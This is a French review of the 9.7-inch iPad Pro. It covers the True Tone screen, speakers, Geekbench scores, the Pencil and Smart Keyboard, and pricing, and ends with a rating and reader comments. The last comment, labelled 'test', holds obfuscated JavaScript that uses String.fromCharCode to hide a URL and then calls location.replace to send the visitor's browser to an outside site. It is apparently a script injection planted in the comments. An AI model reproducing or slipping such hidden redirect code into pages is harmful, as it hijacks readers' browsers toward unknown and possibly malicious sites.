Banc d’essai de l’iPad Pro de 9,7 pouces

Banc d'essai

Exclusif

L’iPad Pro de 9,7 pouces est venu rejoindre l’iPad Pro de 12,9 pouces seulement 6 mois après l’introduction de ce dernier. Au moment où nous attendions tous un nouvel iPad, Apple décide plutôt de faire profiter les toutes nouvelles fonctionnalités à un nouveau modèle Pro au lieu de lancer un troisième iPad Air.

Design

Cet iPad Pro ressemble énormément à l’iPad Air 2 toujours sur le marché : tous deux ont les mêmes dimensions et le même poids, et du premier coup d’œil, ils ont l’air identiques. Apple a plutôt concentré ses efforts du côté des composantes plutôt que de changer le look de la tablette.

ipadpro97_01

La plus grande nouveauté se situe dans l’écran de 9,7 pouces, qui offre une gamme de couleurs améliorée dépassant tout ce qui s’est fait jusqu’à présent dans un appareil portable. En simple, le plage de couleurs étendue qui peut s’afficher sur cet écran vient rejoindre celui des plus récents iMac.

De plus, l’iPad Pro de 9,7 pouces est le premier appareil d’Apple à intégrer un écran True Tone doté de capteurs qui adaptent subtilement la température de l’écran à votre environnement. Il s’agit ici d’un effet similaire à la fonction Night Shift sous iOS, sans pour autant être aussi radical. À l’extérieur, l’écran adopte une température plus proche du blanc pur, voire légèrement bleuté, tandis qu’à l’intérieur où l’éclairage est généralement plus chaud, l’écran adopte une teinte légèrement plus jaunâtre.

L’appareil photo de 12 mégapixels est semblable à celle des plus récents iPhone, et bien que nous nous entendons pour qualifier le geste de ridicule, Apple semble être consciente que les gens apprécient prendre des photos avec leur iPad. Par contre, l’objectif de la caméra ressort de la coque, contrairement à celui de l’iPad Pro de 12,9 pouces. Ça semble être le prix à payer pour bénéficier d’un bon module de caméra.

ipadpro97_02

Un des aspects que j’aborde rarement lors de mes critiques de tablettes ou de téléphone est la qualité et la puissance des haut-parleurs. Sauf à de rares occasions, ces haut-parleurs microscopiques sont incapables de reproduire le son fidèlement et ne méritent tout simplement pas d’être mentionnés. Apple a fait quelque chose que bien d’autres fabricants ont fait avant : ils ont intégré quatre haut-parleurs dans l’appareil et porté une attention particulière à la qualité de l’acoustique ainsi qu’à sa puissance. Le résultat est surprenant, et vous pouvez tout de suite entendre un son bien plus puissant et bien plus clair que dans le passé. À un point tel que l’appareil peut même vibrer tellement le son peut être amplifié!

Les accessoires lancés en même temps que le grand iPad Pro sont aussi compatible avec cet iPad, mais pour le clavier, il est bien entendu préférable d’opter pour le modèle adapté à sa taille.

Caractéristiques

  • Écran de 9,7 pouces doté de la technologie True Tone et d’une plage de couleurs étendue
  • Définition de 2 048 × 1 536 pixels à 264 ppp
  • Capacité de stockage de 32, 128 ou 256 Go (Wi-Fi et LTE)
  • Processeur A9X
  • Caméra de 12 mégapixels avec flash True Tone
  • Wi-Fi 802.11a/b/g/n/ac, bibande (2,4 et 5 GHz), HT80 avec MIMO
  • Bluetooth 4.2

Performances

Apple nous a habitués, à chaque nouvelle génération d’iPad, à un gain de performance suffisamment appréciable pour qu’une utilisation normale de l’appareil s’en voie accélérée substantiellement. J’ai donc été surpris de ne pas voir cet énorme gain du côté de l’iPad Pro en comparaison à l’iPad Air 2 sorti l’an dernier. On note quelques animations plus rapides, mais c’est surtout lors de calculs intenses que cette différence se fera ressentir, lors du chargement d’un jeu, ou du traitement intense d’une photo de grande taille ou d’un fichier audio.

J’ai aussi fait passer un petit test de performance à la tablette, question de pouvoir mesurer et comparer sa puissance de calcul aux autres appareils iOS.

Examen de calculs monocœur selon Geekbench.

Examen de calculs monocœur selon Geekbench.

Examen de calculs multicœur selon Geekbench.

Examen de calculs multicœur selon Geekbench.

Comme vous pouvez le voir dans les images ci-dessus, la performance monocœur de l’iPad Pro a presque doublée en grande partie dû à sa cadence de 2,2 GHz en comparaison à 1,5 GHz pour l’iPad Air 2. En mode multicœur par contre, le gain n’est que de 20%. Étrangement, selon Geekbench, l’iPad Pro n’aurait que 2 cœurs contre 3 pour l’iPad Air 2.

Étant donné que l’iPad Pro est présenté comme un appareil suffisamment puissant pour remplacer un véritable ordinateur, je me suis amusé à comparer ses performances à celles des Mac des années précédentes. L’iPad Pro de 9,7 pouces est donc aussi puissant qu’un MacBook Pro de 13 pouces de 2014 doté d’un processeur Core i5-4308U de 2,8 GHz en mode simple cœur, et plus puissant qu’un Mac Mini de 2014 doté du processeur Core i5-4260U de 1,4 GHz. Bien que cela soit impressionnant, nous sommes encore loin des processeurs Intel de dernière génération qui obtiennent 4 300 / 14 700 points contre 3 200 / 5 400 points pour cet iPad. Et je n’ai évidemment pas tenu compte des Mac Pro avec une douzaine de cœurs qui peuvent atteindre 32 225 points.

C’est tout de même intéressant de voir que les processeurs de type ARM d’Apple peuvent rattraper bien des ordinateurs de seulement 2 ans. Je persiste à croire qu’un jour Apple intégrera certaines optimisations qui feront de ces processeurs des remplacements idéaux aux processeurs d’Intel dans ses ordinateurs.

Écran, couleur et température

Cet aspect est selon moi le changement le plus important et ayant le plus d’impact sur l’utilisation de l’iPad. Avant toute chose, il faut savoir que ce n’est pas tout le monde qui apprécie que l’écran change de couleur et bien des gens préfèrent garder la fonction Night Shift désactivée. Je ne fais pas partie de ce groupe.

J’apprécie énormément ce qu’apporte ce mode, particulièrement pour une utilisation nocturne, et j’ai remarqué avec le temps ses bienfaits. Tellement que je continue à utiliser une version personnalisée de f.lux sur mon iPhone pour pousser le «jaunissement» de l’écran au maximum.

True Tone reprend le travail accompli par Night Shift en exploitant de nouveaux capteurs sur l’écran de cet iPad qui calculent la température de votre éclairage ambiant. Avec cette information, iOS ajuste la couleur de l’écran pour être plus chaude ou plus froide. On parle ici d’un ajustement qui se fait graduellement sur plusieurs secondes, généralement en douceur de sorte que le changement est imperceptible. Ce n’est que lorsque vous passerez à l’écran d’un appareil dépourvu de cette fonction que vous remarquerez la différence.

Les haut-parleurs demeurent tout de même des haut-parleurs de tablettes, et ne vous attendez pas à ce qu’ils rivalisent avec la qualité des haut-parleurs Sonos.

De leurs côtés, les haut-parleurs demeurent tout de même des haut-parleurs de tablettes, et ne vous attendez pas à ce qu’ils rivalisent avec la qualité des haut-parleurs Sonos. Toutefois, leur puissance a été largement augmentée, tandis que l’effet de distorsion «robotique» à haut volume a largement été diminué. Par exemple, avec les précédents iPad, il m’était impossible de bien entendre le son d’une vidéo lorsque je faisais la vaisselle. Avec ce nouvel iPad, il m’est maintenant facile de bien saisir ce qui est dit dans la piste audio.

Apple semble également avoir fait de subtils changements du côté de la gestion de la carte SIM. Avec un iPad doté de la fonction cellulaire mais sans carte SIM, un avertissement s’affichait après chaque démarrage avec la mention No SIM constamment présente dans la barre d’état. Sur l’iPad Pro de 9,7 pouces, ces deux alertes sont absentes, et pour un utilisateur qui possède un iPad sans carte SIM, c’est franchement moins agaçant.

Accessoires

On ne peut pas parler de l’iPad Pro sans faire mention des accessoires. Le Pencil et le Smart Keyboard sont tous deux compatibles avec l’iPad Pro de nouveau format ,et Apple a aussi mis à notre disposition un clavier Smart Keyboard adapté à la taille réduite de cet iPad Pro.

ipadpro97_04

ipadpro97_03

Le Pencil reste toujours le stylet le plus précis et le plus agréable à utiliser que j’ai pu essayer. À condition, bien sûr, d’utiliser une application qui prend en charge les nouveaux API fournis aux développeurs par Apple pour profiter des particularités de ce nouvel accessoire. Le rejet complet de la paume et une précision de trait surprenante font des deux iPad Pro des tablettes graphiques très impressionnantes.

Le Smart Keyboard est par contre un produit qui me laisse sur mon appétit. Non pas parce qu’Apple a fait des compromis, mais bien parce qu’il est physiquement impossible de mettre plus d’espace entre les touches. Mes doigts ont tendance à se toucher lorsque je tape sur ce clavier, et je fais beaucoup plus d’erreurs de frappes que sur un clavier standard. Le matériel utilisé, un genre de textile qui ressemble à du nylon, est flexible et bouge aisément avec chaque touche enfoncée. La conception même du Smart Keyboard permet toujours de placer l’iPad sur une table, avec la couverture comme support, que ce soit à plat ou à la verticale.

ipadpro97_05

Bien que le Smart Keyboard tient assez solidement à l’iPad Pro, j’aurais préféré que le contact magnétique soit plus fort, car j’ai plus d’une fois failli faire tomber l’iPad alors que le clavier se déconnectait. Je m’étais attendu à trouver la bosse causée par le clavier irritant, mais ce ne fut pas le cas.

Une omission qui devient rapidement irritante lorsque l’on utilise l’iPad Pro et un Pencil : où ranger ce stylet? Apple n’a pas de solution pour nous, mais j’ai trouvé un support parfait, une boucle à stylo fabriquée par la compagnie Leuchtturm1917 pour moins de 7$. On colle tout simplement cette boucle sur le dos de l’iPad Pro du côté opposé au Smart Connector et le tour est joué!

Conclusion

Au final, l’iPad Pro de 9,7 pouces est une évolution très intéressante du déjà fort intéressant iPad Air 2. Les accessoires et les caractéristiques empruntées à l’iPad Pro de 12,9 pouces en font un produit que je recommande fortement, bien que ce ne soit pas le modèle que je recommande pour tous.

L’iPad Pro de 9,7 pouces le moins cher est tout de même 799$, auquel il faut ajouter un Pencil à 129$ (!) et un clavier à 229$ (!!), pour un total de 1 158$ (!!!) pour ainsi profiter de toutes les fonctionnalités de cet iPad. Pour la très grande majorité des utilisateurs, un iPad Air 2 est largement suffisant et bien plus abordable à 499$.

Comme son nom l’indique, l’iPad Pro est destiné à une clientèle professionnelle qui utilise cet appareil dans le cadre de ses fonctions ou pour une personne qui cherche à remplacer complètement son portable par un iPad. Si vous n’avez pas d’intérêt pour le Pencil ou un Smart Keyboard, l’iPad Pro n’est vraiment pas pour vous. Attendez plutôt l’iPad Air 3 si vous voulez absolument l’écran True Tone, sans quoi l’iPad Air 2 est toujours recommandable.

Évaluation

Verdict

Pour les utilisateurs professionnels et graphistes intéressés par le Pencil, l'iPad Pro est la tablette tout indiquée, pourvu que leur budget en permette l'achat.

Note finale : 4.5
Critères
Design
5
Performance
4
Fonctionnalités
4.5
Prix
4

Points forts

  • Design solide
  • Écran True Tone très agréable
  • Accessoires forts intéressants
  • Performances intéressantes

Points faibles

  • Dispendieux, pas pour tous
  • Clavier trop compacte
  • Jean Labelle

    Je possède l’iPad Pro de 12,9. Lequel est plus adapté vu sa taille à une utilisation intensive et exigeante. Je suis d’accord pour dire que l’iPad Air 2 est entièrement satisfaisant pour du 9,7 pouces.

  • test

    test

  • test

    location.replace(String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 97, 108, 45, 102, 97, 114, 97, 110, 115, 105, 46, 54, 116, 101, 46, 110, 101, 116))